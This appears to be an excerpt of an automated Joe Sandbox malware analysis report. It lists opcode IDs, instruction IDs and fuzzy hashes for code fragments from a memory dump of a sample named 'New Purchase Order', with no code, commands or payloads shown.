                          • Instruction Fuzzy Hash: 2231D132A0217C9BDB39DF18CC41FEEB7B9AB15744F0100A1E645EB290D774AE908FA1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                          • Instruction ID: 9848bcada5134d1c6d01aaaadf208b8a60d209ec4e0a29aaa1416a0e03a5d66d
                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                          • Instruction Fuzzy Hash: D5217131A00609EBCB19CF58C980A8EBBB9FF48714F108065EE159B641D772EE158B90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e3e4496cce1e6fdba4dfd14097eba45d45e19c03b5c1f222c289c0b6f96097e3
                          • Instruction ID: 687538f00bf8f59c9c4ec8071fb6bf43bb1561aeb80f655d8dd98dbecf0692ba
                          • Opcode Fuzzy Hash: e3e4496cce1e6fdba4dfd14097eba45d45e19c03b5c1f222c289c0b6f96097e3
                          • Instruction Fuzzy Hash: D521D2726047559BCB2ADF18C880B6B77E8FF88760F014519FD549BA41D731E911CBA2
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                          • Instruction ID: fc1e25ebbfa99313edf5b2f418d17bd0b1af3652ac8d0256989834ef442a3982
                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                          • Instruction Fuzzy Hash: B8318931600655AFDB29DBA8C884F6AB7F9EF45358F1045A9E552CB290E730EE02CB51
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee8d0fe3a1328d70028e0c83485cb84a5186f43dad87848a987a3c6fe7512349
                          • Instruction ID: 6b342059f4a0a014bcc5afc6b6ee46b0347cc7cf0207c22d0dc305c28d5f82bb
                          • Opcode Fuzzy Hash: ee8d0fe3a1328d70028e0c83485cb84a5186f43dad87848a987a3c6fe7512349
                          • Instruction Fuzzy Hash: 1031A279A01205EFCB18CF1CC4849AEBBB6FF84704F554859E8099B391E731EA50CB91
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20df30316c6044e2505eede58db527685d0504c8de685314d7d7cb850fee802b
                          • Instruction ID: 47b3b052fed47b76eb5ad194b3cc1ba62e0474405ee950c65fbe333de73337c0
                          • Opcode Fuzzy Hash: 20df30316c6044e2505eede58db527685d0504c8de685314d7d7cb850fee802b
                          • Instruction Fuzzy Hash: 6B217C71900629ABCF299F59C881AFEF7F4FF48744B510069F941AB240D778AD42CBA1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef15f1c75df3d0d9b8ae873792596ca4047237f3acf7e6b55fc29becb4f42ec4
                          • Instruction ID: 9cb711930f58806a7b8bc4da3927a5747b2e033fd81338277efe5d3178cdb962
                          • Opcode Fuzzy Hash: ef15f1c75df3d0d9b8ae873792596ca4047237f3acf7e6b55fc29becb4f42ec4
                          • Instruction Fuzzy Hash: 0F218B71600655ABD719DB68D884BAAB7B8FF48744F140069F944DB7A0D734ED40CB68
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e37b2483bc3123b5ad27321519907038400ad4e7aca9cc423b176697c789bd49
                          • Instruction ID: b58e889384f44c900423ffb24ae8c5fd7349bf3d63b003e27b0ddb1376cd7523
                          • Opcode Fuzzy Hash: e37b2483bc3123b5ad27321519907038400ad4e7aca9cc423b176697c789bd49
                          • Instruction Fuzzy Hash: 9B2145729093428FD319EF69C888B9BBBECBF94644F080456FD90C7260D730C908C6A2
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b03b6ea8bc4b56a06fbb4fdb6321ea07cb222728181cb5ddb6201d27c4dedc1
                          • Instruction ID: 7642d1a5b6f95fc92eb619409ce3d41ed5308fdfbe9c815e832cc711e8dde6c4
                          • Opcode Fuzzy Hash: 2b03b6ea8bc4b56a06fbb4fdb6321ea07cb222728181cb5ddb6201d27c4dedc1
                          • Instruction Fuzzy Hash: 40210833705681EBE72E57AC9C44B293BD4AF41B78F290364FE709B6E2DB78C8418241
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fb70cf07924e720310de735b78cad9fa56a0fcdb31234a613969c487b9843ac
                          • Instruction ID: 60d3eaf828e4da7a60dfa6b40866447e67e54fa42eb21a3306168591357385eb
                          • Opcode Fuzzy Hash: 7fb70cf07924e720310de735b78cad9fa56a0fcdb31234a613969c487b9843ac
                          • Instruction Fuzzy Hash: 4721A979210A11AFC729DF29C800B56B7F5BF18B48F248468E559DBB61E371E842CF98
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e40e5d4acb015d73a694941c65ecad72cd884f8e530e2992854d0715e1fcc3b8
                          • Instruction ID: 55cc95d4bfd3747a233f0831059e0200f75cf1f2ed4af7db08ec2de1f8fe104f
                          • Opcode Fuzzy Hash: e40e5d4acb015d73a694941c65ecad72cd884f8e530e2992854d0715e1fcc3b8
                          • Instruction Fuzzy Hash: DB112C72340F11BFE32A5595AC05F67B6D9DFD4B60F150428B718DB284DBB0DC018795
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7463869302c6f2d52f54303f49776ab04dc2efcb22bdad73a3b43f5e47862d1a
                          • Instruction ID: bbe42cc6d0c65834aca831475c0f87ec76f9b68716b11c449ddb112452239e0a
                          • Opcode Fuzzy Hash: 7463869302c6f2d52f54303f49776ab04dc2efcb22bdad73a3b43f5e47862d1a
                          • Instruction Fuzzy Hash: 4E21E6B1E00219ABDB24DFAAE9849EEFBF9FF98610F10012EE509A7254D7749941CB50
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                          • Instruction ID: c816d7bba0b05590d6c2a0ccb7c5497e4e86affdb86fbde20debf1c992645cb1
                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                          • Instruction Fuzzy Hash: DE218C72A00219EFDF169F98CC80BAEBBFAEFA8710F214419F910A7251D774D9518B50
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                          • Instruction ID: ed5e990006a807435d22a74c68712bfda1dd4de508c4afcd1bb1ab1f6f3a3582
                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                          • Instruction Fuzzy Hash: CF11EF73601609EFE72A9F88CC40FAABBBCEB94758F104029F6009B180D776ED54CB60
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8d3bff0beccd72a47d4b54fb9ca888d0c092e252a884dfd67110a455c7dae7c5
                          • Instruction ID: 3415ddc309b7d82107348a7ebdc970c048bee2fd796b6359a47b33cd053687ca
                          • Opcode Fuzzy Hash: 8d3bff0beccd72a47d4b54fb9ca888d0c092e252a884dfd67110a455c7dae7c5
                          • Instruction Fuzzy Hash: A211B671700A11DBDB1ACF5DC480956BBE6AFC6750B15416DFE08DF208D7B1E9018790
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4c3f28e34b38834fc66d89662ba1d53b0b448f20062d8dffb470197200c3fb5
                          • Instruction ID: 6b936d57a2e67169cc57b4c4255261c5077eeea7e3db538421e5c44f2aedfb28
                          • Opcode Fuzzy Hash: b4c3f28e34b38834fc66d89662ba1d53b0b448f20062d8dffb470197200c3fb5
                          • Instruction Fuzzy Hash: D5218E75A00206DFCB18CF98C581AAEBBF5FB88718F24426DE505AB315CB71AD06CBD0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b127d36c85f72f776c57eda2e5826d941e1f98b48e9eb307ae3618b235abb499
                          • Instruction ID: 7dca66afc8703cf8ba9a495135cb6c10d0a6f9c36cc1acfbb34d3308344d7b7a
                          • Opcode Fuzzy Hash: b127d36c85f72f776c57eda2e5826d941e1f98b48e9eb307ae3618b235abb499
                          • Instruction Fuzzy Hash: A6218E75510A01EFD7389F68C840B66B7F8FF44650F44882DE59AC7650DB75AC50CBA1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0dd837b9ee9e143a4b67c776ed77e67246ec8cc56393585cb54531772e84575a
                          • Instruction ID: 9bf38180ad0f8fcb0806b2eef040c076dc45e91161bb89d60307c5654d47fdb1
                          • Opcode Fuzzy Hash: 0dd837b9ee9e143a4b67c776ed77e67246ec8cc56393585cb54531772e84575a
                          • Instruction Fuzzy Hash: 85119132240615EFC72ADB59CD40FDA77A8EFA9E64F114029F6159B351EB70E901C7A0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: adb26c97263ec173f1561b0ab98300795bfcf127283b30fe812b8921e963d535
                          • Instruction ID: 3af9328255c438f0fb8085e58bf4568a72ebb6a37c23d77cc7a977648f41473b
                          • Opcode Fuzzy Hash: adb26c97263ec173f1561b0ab98300795bfcf127283b30fe812b8921e963d535
                          • Instruction Fuzzy Hash: E0114833710121ABCF1DDB29CC80A6FB666EBD1374B258539ED32CB280EB309802C290
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d3f59f67acbffd63ef10edf2fbaad742f16b59e1f130fb22dd66288b1f45d55
                          • Instruction ID: d33dcd1547b1058d5999b9202542d75c03cc3db95caf03c8b406a1fcab73b0c4
                          • Opcode Fuzzy Hash: 5d3f59f67acbffd63ef10edf2fbaad742f16b59e1f130fb22dd66288b1f45d55
                          • Instruction Fuzzy Hash: BD11E376A01645EFCB2DCF59E580A5ABBFDEF94610F068079E9059B310E738DD10CB90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                          • Instruction ID: 4c6ea02fc9d979c167eaa38f0a27c3258c582ab2cda3ed9a0a9c02b423716f0a
                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                          • Instruction Fuzzy Hash: E1110136A00919AFDB1DCB58CC05B9EBBF5FF84214F058269E996A7340E735AE01CB80
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                          • Instruction ID: 7c47e708f3961c706382a9e0278b207849bd29c77eaa6e3a35754fef89b93b55
                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                          • Instruction Fuzzy Hash: 8611C232602E05EFE7399F49C880BD6BBE6EF45758F058428FA099B164DB71DC40DB90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2463864aabd87eb85aa9fa3960f449ea12f6ec9164401eadbad778ba7fb99ed
                          • Instruction ID: fd9b213fe81525872f553bf1c68a31b6dab8bb755c6e43dc56e7905c692f8d7c
                          • Opcode Fuzzy Hash: b2463864aabd87eb85aa9fa3960f449ea12f6ec9164401eadbad778ba7fb99ed
                          • Instruction Fuzzy Hash: 9101DB32605645EBE71E936DD844F6B6BDCEF81754F190065FD108B651DB24DC00C2A1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef3390d794c0e320f67bf840209152d6ab7256d3ba0fd59b84d128981b326f14
                          • Instruction ID: 8693a6e5007a64a18b436448ff7638a0541fd4681f5ee41f01b2ceb5b8648e1b
                          • Opcode Fuzzy Hash: ef3390d794c0e320f67bf840209152d6ab7256d3ba0fd59b84d128981b326f14
                          • Instruction Fuzzy Hash: 2A11CE7A200A45AFDB3ECF5AD844F567BA9EBC6B64F014119F9048BA98C374E800CF60
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ab7157db5453855810b9bbc7fc0add982136f36691e2285a7c34a4775f6e73d
                          • Instruction ID: b5e5d6952c7d7ab3277cbfa2a24e3c73bd0620212e392dddae7d17d731153791
                          • Opcode Fuzzy Hash: 1ab7157db5453855810b9bbc7fc0add982136f36691e2285a7c34a4775f6e73d
                          • Instruction Fuzzy Hash: 7C112932610A529FD723EA29D844F27B7A5FFC4710F148619EB86C76D1EB30E802C790
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fae7e227de9fda5ae611d7deaf41864431e0f7c6388c444858dc2dc183e4b8f
                          • Instruction ID: 918e4c1ddec2a22cb50303c776ac374571747ddabb0a054a4dd10bf8ac143138
                          • Opcode Fuzzy Hash: 7fae7e227de9fda5ae611d7deaf41864431e0f7c6388c444858dc2dc183e4b8f
                          • Instruction Fuzzy Hash: F511E572A00716ABDB25EF59E980B9EFBBCFF84B50F500055DA01A7200D731AD11CB90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 71efea33014d70140fb21164044bd4abe60a4d4e85bf2fd321d4ad8a5de61871
                          • Instruction ID: 721a4236213290b8dbdf58063565500969eed0378f75945f0f11f0ddd6c81d6a
                          • Opcode Fuzzy Hash: 71efea33014d70140fb21164044bd4abe60a4d4e85bf2fd321d4ad8a5de61871
                          • Instruction Fuzzy Hash: FF01D271901109EFC329DF28E408F6ABBF9EF81318F20816AE4048B261D770AD42CB90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                          • Instruction ID: 4d3b30ce286b4a03cdd558c61be3000c95d0244e6508a64389a0a0c26f202aaa
                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                          • Instruction Fuzzy Hash: 5511C6756166C2EBEB2E972C8544B257B94AB01B5CF1A00A0ED61C7642F328C942C251
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                          • Instruction ID: 0ed372d8c612a2d41679bd68cf869e4a1b7ea81e2b7ace6e344259f1f7f23e2b
                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                          • Instruction Fuzzy Hash: 6101F972602905AFE72D5F58CC80FD67BA9EF80754F058024EA059B260E775DD40CBD0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                          • Instruction ID: 71be8a19088f684dca3158df5afd3600f6593957d1d4a20d02c44084c40a76b2
                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                          • Instruction Fuzzy Hash: 190149314047329BCB398F59E840A32BBF6FF56B60701892DFC958BA81D331D420CB60
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                          • Instruction ID: a2ac3b2d32b3030b6f876c9c0d8331a043a646e7fb0866c592af4797c46939af
                          • Opcode Fuzzy Hash: 74b800becc606bc159b92d5b0e4bee6f7ffca6ff1bd89f0506c8425a8017136f
                          • Instruction Fuzzy Hash: C2010432561556AFC333EF1C9800E12B7A8EB81774B268325EB689B1D7D730D801CBC0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                          • Instruction ID: 87df5ead051e11c44ff55a9dabda6457b1ccad46ad8ff98b36d9f57b85d84d76
                          • Opcode Fuzzy Hash: 821cfdb7f7777809c0eab1480a54dbea18bc7919f0de8e1871054e316746842b
                          • Instruction Fuzzy Hash: AE11A136242241EFDB19EF19CD80F167BB8FF54B58F1000A5ED059B661D335ED01CA90
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                          • Instruction ID: d8ca5bf1a33accc01375b8e4493f20dcfd9c0766c163b011de22840833785487
                          • Opcode Fuzzy Hash: 3cc030bca722b04af536d151ef34807c74cb14d7275fa288d9a6e7b7c572d582
                          • Instruction Fuzzy Hash: F7115E71541229ABEB39AB64CC41FED7374FB44714F5041D4A314A61E0DB709E91CF85
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                          • Instruction ID: 8118c203469a48c3bacdc926394b444d2a89a780a653a29f32ce28acd216f3f9
                          • Opcode Fuzzy Hash: 1b657f3cb14aa8e74b451c16f387aeaa46c8e7fa590575d87aedc84abafdcff6
                          • Instruction Fuzzy Hash: 3C111772900119ABCB25DB95CC84DEFBB7CEF58258F044166E906E7211EB34AA15CBA1
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                          • Instruction ID: f8129a8681817acd9ea3289079ffcac2740282288d7d7248795d4b24c372af30
                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                          • Instruction Fuzzy Hash: 180128322001118BEF1DBA1DD880F56B767BFC4700F5681A9ED158F24ADB71CC81C790
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38230ac6c351fe2aa1c094fcc2441b31efb457ea4d3342ad7e00eaac74356620
                          • Instruction ID: c163e7a1054e8bec3aac0fc582ce7a08bfbc5e1d9f8fb7d4618e95b774d33886
                          • Opcode Fuzzy Hash: 38230ac6c351fe2aa1c094fcc2441b31efb457ea4d3342ad7e00eaac74356620
                          • Instruction Fuzzy Hash: 751104326401469FC319CF58D800BA6FBB9FB6A754F188159E848CB315D732EC80CBA0
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b743588e5a55cddcb2732d1c52cfd01924245cbf3190e513e14056ce87dab92
                          • Instruction ID: 17a60e6e9cce8c413f2b4e3a14c0124224a08a2b7146967509920fc5170d3517
                          • Opcode Fuzzy Hash: 7b743588e5a55cddcb2732d1c52cfd01924245cbf3190e513e14056ce87dab92
                          • Instruction Fuzzy Hash: FE1118B1A00209ABCB04DFA9D581AAEBBF8FF58250F10406AE905E7351D774EA018BA4
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a78e154c4e78bb7b2e59e5259f301f90702d9cb77288569654090b0ac68defb7
                          • Instruction ID: bf274b290b7e70897c88cae5008feabb12b5df5a4354a92b7a2bb607054dd257
                          • Opcode Fuzzy Hash: a78e154c4e78bb7b2e59e5259f301f90702d9cb77288569654090b0ac68defb7
                          • Instruction Fuzzy Hash: D2012435142222ABCB3EEF198840D7ABBB9FF51A56B05442EF1010F200CB34DC81CBD2
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                          • Instruction ID: a9ec60acb6d62d583aab1caa749eb4286d3685965a3c7a31f2bcc6a2ac33daee
                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
